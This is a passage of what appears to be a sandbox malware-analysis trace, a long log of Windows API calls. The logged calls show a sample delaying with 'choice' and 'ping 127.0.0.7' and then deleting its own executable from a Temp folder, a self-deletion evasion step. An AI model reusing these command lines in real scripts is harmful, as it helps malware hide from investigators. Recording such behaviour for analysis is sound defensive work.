(lpRootPathName="C:\\") returned 0x3 [0257.947] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2fef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fef98) returned 0xffffffff [0257.947] GetLastError () returned 0x2 [0257.947] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\choice", fInfoLevelId=0x1, lpFindFileData=0x2fef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fef98) returned 0xffffffff [0257.948] GetLastError () returned 0x2 [0257.948] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0257.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2fef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fef98) returned 0x6e1278 [0257.948] GetProcessHeap () returned 0x6e0000 [0257.948] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6f3568 [0257.948] FindClose (in: hFindFile=0x6e1278 | out: hFindFile=0x6e1278) returned 1 [0257.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x2fef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fef98) returned 0xffffffff [0257.948] GetLastError () returned 0x2 [0257.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x2fef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fef98) returned 0x6e1278 [0257.948] GetProcessHeap () returned 0x6e0000 [0257.948] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f3568, Size=0x4) returned 0x6f3568 [0257.948] FindClose (in: hFindFile=0x6e1278 | out: hFindFile=0x6e1278) returned 1 [0257.949] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0257.949] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0257.949] GetConsoleTitleW (in: lpConsoleTitle=0x2ff490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0258.164] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ff318, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ff3e0 | out: lpAttributeList=0x2ff318, lpSize=0x2ff3e0) returned 1 [0258.164] UpdateProcThreadAttribute (in: lpAttributeList=0x2ff318, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ff3d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ff318, lpPreviousValue=0x0) returned 1 [0258.164] GetStartupInfoW (in: lpStartupInfo=0x2ff2d4 | out: lpStartupInfo=0x2ff2d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0258.165] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0258.166] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\choice.exe", lpCommandLine="choice /C Y /N /D Y /T 3 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x2ff374*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /C Y /N /D Y /T 3 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ff3c0 | out: lpCommandLine="choice /C Y /N /D Y /T 3 ", lpProcessInformation=0x2ff3c0*(hProcess=0x78, hThread=0x74, dwProcessId=0x67c, dwThreadId=0xe3c)) returned 1 [0258.635] CloseHandle (hObject=0x74) returned 1 [0258.635] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0258.635] GetProcessHeap () returned 0x6e0000 [0258.636] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5830 | out: hHeap=0x6e0000) returned 1 [0258.636] GetEnvironmentStringsW () returned 0x6f4528* [0258.636] GetProcessHeap () returned 0x6e0000 [0258.636] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xb5e) returned 0x6f5090 [0258.636] FreeEnvironmentStringsW (penv=0x6f4528) returned 1 [0258.636] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0262.647] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ff2b4 | out: lpExitCode=0x2ff2b4*=0x1) returned 1 [0262.647] CloseHandle (hObject=0x78) returned 1 [0262.647] _vsnwprintf (in: _Buffer=0x2ff3fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ff2c0 | out: _Buffer="00000001") returned 8 [0262.648] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0262.648] GetProcessHeap () returned 0x6e0000 [0262.648] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5090 | out: hHeap=0x6e0000) returned 1 [0262.648] GetEnvironmentStringsW () returned 0x6f4528* [0262.648] GetProcessHeap () returned 0x6e0000 [0262.648] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xb84) returned 0x6f50b8 [0262.648] FreeEnvironmentStringsW (penv=0x6f4528) returned 1 [0262.648] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0262.648] GetProcessHeap () returned 0x6e0000 [0262.648] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f50b8 | out: hHeap=0x6e0000) returned 1 [0262.648] GetEnvironmentStringsW () returned 0x6f4528* [0262.648] GetProcessHeap () returned 0x6e0000 [0262.648] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xb84) returned 0x6f50b8 [0262.648] FreeEnvironmentStringsW (penv=0x6f4528) returned 1 [0262.648] GetProcessHeap () returned 0x6e0000 [0262.648] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f0018 | out: hHeap=0x6e0000) returned 1 [0262.648] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ff318 | out: lpAttributeList=0x2ff318) [0262.648] GetConsoleTitleW (in: lpConsoleTitle=0x2ff6fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0262.649] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f3578, Size=0x9a) returned 0x6f3578 [0262.649] GetProcessHeap () returned 0x6e0000 [0262.649] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f3578) returned 0x9a [0262.649] GetProcessHeap () returned 0x6e0000 [0262.649] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12c) returned 0x6f5c48 [0262.649] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f5c48, Size=0x9a) returned 0x6f5c48 [0262.649] GetProcessHeap () returned 0x6e0000 [0262.649] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f5c48) returned 0x9a [0262.649] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x2ff4b4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0262.649] GetProcessHeap () returned 0x6e0000 [0262.649] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x38) returned 0x6ef500 [0262.649] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x2fe544 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0262.649] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2fe774, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2fe778, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2fe774*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0262.650] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0262.650] GetProcessHeap () returned 0x6e0000 [0262.650] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2c) returned 0x6f5d90 [0262.650] GetProcessHeap () returned 0x6e0000 [0262.650] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x258) returned 0x6f5dc8 [0262.650] _wcsicmp (_String1="wqm58yk7.exe", _String2=".") returned 73 [0262.650] _wcsicmp (_String1="wqm58yk7.exe", _String2="..") returned 73 [0262.650] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 0x2020 [0262.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6f6030 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0262.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", nBufferLength=0x104, lpBuffer=0x2feb98, lpFilePart=0x2feb80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", lpFilePart=0x2feb80*="wqm58yk7.exe") returned 0x46 [0262.650] SetErrorMode (uMode=0x0) returned 0x1 [0262.651] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0262.651] GetProcessHeap () returned 0x6e0000 [0262.651] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x258) returned 0x6f2358 [0262.651] _wcsicmp (_String1="wqm58yk7.exe", _String2=".") returned 73 [0262.651] _wcsicmp (_String1="wqm58yk7.exe", _String2="..") returned 73 [0262.651] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 0x2020 [0262.651] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", fInfoLevelId=0x0, lpFindFileData=0x6f25c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6f25c4) returned 0x6f6350 [0262.651] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 1 [0262.654] FindNextFileW (in: hFindFile=0x6f6350, lpFindFileData=0x6f25c4 | out: lpFindFileData=0x6f25c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5d79300, ftCreationTime.dwHighDateTime=0x1d6f018, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xe5d79300, ftLastWriteTime.dwHighDateTime=0x1d6f018, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wqm58yk7.exe", cAlternateFileName="")) returned 0 [0262.655] GetLastError () returned 0x12 [0262.655] FindClose (in: hFindFile=0x6f6350 | out: hFindFile=0x6f6350) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f25b8 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f62c8 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6e1298 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6240 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f2358 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6028 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5dc8 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5d90 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6ef500 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5cf0 | out: hHeap=0x6e0000) returned 1 [0262.655] GetProcessHeap () returned 0x6e0000 [0262.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f5c48 | out: hHeap=0x6e0000) returned 1 [0262.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0262.655] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0262.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0262.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6e41ac | out: lpMode=0x4a6e41ac) returned 1 [0262.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0262.656] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6e41b0 | out: lpMode=0x4a6e41b0) returned 1 [0262.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0262.656] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0262.656] SetConsoleInputExeNameW () returned 0x1 [0262.657] GetConsoleOutputCP () returned 0x1b5 [0262.657] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6e4260 | out: lpCPInfo=0x4a6e4260) returned 1 [0262.657] SetThreadUILanguage (LangId=0x0) returned 0x409 [0262.657] exit (_Code=0) Process: id = "563" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x1cf20000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xba8" cmd_line = "ping 127.0.0.7 -n 3 " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1413 os_tid = 0xed4 [0258.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfbe4 | out: lpSystemTimeAsFileTime=0x2dfbe4*(dwLowDateTime=0x6ad24ab0, dwHighDateTime=0x1d6f0d1)) [0258.877] GetCurrentProcessId () returned 0xc9c [0258.877] GetCurrentThreadId () returned 0xed4 [0258.877] GetTickCount () returned 0x1171dce [0258.877] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfbdc | out: lpPerformanceCount=0x2dfbdc*=37797832790) returned 1 [0258.880] GetModuleHandleA (lpModuleName=0x0) returned 0x8a0000 [0258.934] __set_app_type (_Type=0x1) [0258.934] __p__fmode () returned 0x770331f4 [0258.934] __p__commode () returned 0x770331fc [0258.934] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8a2ae1) returned 0x0 [0258.934] __getmainargs (in: _Argc=0x8a50d4, _Argv=0x8a50dc, _Env=0x8a50d8, _DoWildCard=0, _StartInfo=0x8a50e8 | out: _Argc=0x8a50d4, _Argv=0x8a50dc, _Env=0x8a50d8) returned 0 [0258.934] SetThreadUILanguage (LangId=0x0) returned 0x409 [0258.935] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0258.935] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x8a5440 | out: lpWSAData=0x8a5440) returned 0 [0258.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x2df674 | out: phkResult=0x2df674*=0x7c) returned 0x0 [0258.947] RegQueryValueExA (in: hKey=0x7c, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x2df668, lpData=0x2df670, lpcbData=0x2df66c*=0x4 | out: lpType=0x2df668*=0x0, lpData=0x2df670*=0x0, lpcbData=0x2df66c*=0x4) returned 0x2 [0258.947] RegCloseKey (hKey=0x7c) returned 0x0 [0258.947] getaddrinfo (in: pNodeName="127.0.0.7", pServiceName=0x0, pHints=0x2df63c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x2df664 | out: ppResult=0x2df664*=0x673ed8*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x66f0c0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.7"), ai_next=0x0)) returned 0 [0258.947] FreeAddrInfoW (pAddrInfo=0x673ed8*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x66f0c0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.7"), ai_next=0x0)) [0258.947] IcmpCreateFile () returned 0x678c28 [0259.073] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x6833e8 [0259.073] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x684168 [0259.073] getnameinfo (in: pSockaddr=0x8a55e0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.7"), SockaddrLength=0x10, pNodeBuffer=0x2dfb64, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.7", pServiceBuffer=0x0) returned 0 [0259.082] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="H´g") returned 0x14 [0259.088] CharToOemBuffA (in: lpszSrc="\r\nPinging 127.0.0.7 ", lpszDst=0x67b448, cchDstLength=0x14 | out: lpszDst="\r\nPinging 127.0.0.7 ") returned 1 [0259.089] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.089] _write (in: _FileHandle=1, _Buf=0x67b448*, _MaxCharCount=0x14 | out: _Buf=0x67b448*) returned 20 [0259.089] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.089] LocalFree (hMem=0x67b448) returned 0x0 [0259.089] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="@6h") returned 0x18 [0259.089] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x683640, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0259.089] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.089] _write (in: _FileHandle=1, _Buf=0x683640*, _MaxCharCount=0x18 | out: _Buf=0x683640*) returned 24 [0259.089] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.089] LocalFree (hMem=0x683640) returned 0x0 [0259.089] SetConsoleCtrlHandler (HandlerRoutine=0x8a17ca, Add=1) returned 1 [0259.089] IcmpSendEcho2Ex (in: IcmpHandle=0x678c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x700007f, RequestData=0x6833e8, RequestSize=0x20, RequestOptions=0x2df690, ReplyBuffer=0x684168, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x684168) returned 0x1 [0259.179] inet_ntoa (in=0x700007f) returned="127.0.0.7" [0259.179] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="H´g") returned 0x16 [0259.179] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.7: ", lpszDst=0x67b448, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.7: ") returned 1 [0259.179] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.180] _write (in: _FileHandle=1, _Buf=0x67b448*, _MaxCharCount=0x16 | out: _Buf=0x67b448*) returned 22 [0259.180] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.180] LocalFree (hMem=0x67b448) returned 0x0 [0259.180] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0259.180] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0259.180] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.180] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0259.180] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.180] LocalFree (hMem=0x67c0d8) returned 0x0 [0259.180] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0259.180] CharToOemBuffA (in: lpszSrc="time=1ms ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="time=1ms ") returned 1 [0259.180] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.180] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0259.180] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.180] LocalFree (hMem=0x67c0d8) returned 0x0 [0259.180] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0259.180] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0259.180] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0259.180] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0259.180] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0259.180] LocalFree (hMem=0x67c0d8) returned 0x0 [0259.180] Sleep (dwMilliseconds=0x3e7) [0260.353] IcmpSendEcho2Ex (in: IcmpHandle=0x678c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x700007f, RequestData=0x6833e8, RequestSize=0x20, RequestOptions=0x2df690, ReplyBuffer=0x684168, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x684168) returned 0x1 [0260.354] inet_ntoa (in=0x700007f) returned="127.0.0.7" [0260.355] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="H´g") returned 0x16 [0260.355] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.7: ", lpszDst=0x67b448, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.7: ") returned 1 [0260.355] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0260.355] _write (in: _FileHandle=1, _Buf=0x67b448*, _MaxCharCount=0x16 | out: _Buf=0x67b448*) returned 22 [0260.355] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0260.355] LocalFree (hMem=0x67b448) returned 0x0 [0260.355] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0260.355] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0260.355] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0260.355] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0260.355] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0260.355] LocalFree (hMem=0x67c0d8) returned 0x0 [0260.355] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x2df66c, nSize=0x0, Arguments=0x2df668 | out: lpBuffer="ØÀg") returned 0x9 [0260.355] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0260.355] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0260.355] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0260.355] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0260.355] LocalFree (hMem=0x67c0d8) returned 0x0 [0260.355] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0260.355] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0260.355] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0260.355] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0260.355] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0260.355] LocalFree (hMem=0x67c0d8) returned 0x0 [0260.355] Sleep (dwMilliseconds=0x3e8) [0261.364] IcmpSendEcho2Ex (in: IcmpHandle=0x678c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x700007f, RequestData=0x6833e8, RequestSize=0x20, RequestOptions=0x2df690, ReplyBuffer=0x684168, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x684168) returned 0x1 [0261.366] inet_ntoa (in=0x700007f) returned="127.0.0.7" [0261.366] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="H´g") returned 0x16 [0261.366] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.7: ", lpszDst=0x67b448, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.7: ") returned 1 [0261.366] _setmode (_FileHandle=1, _Mode=32768) returned 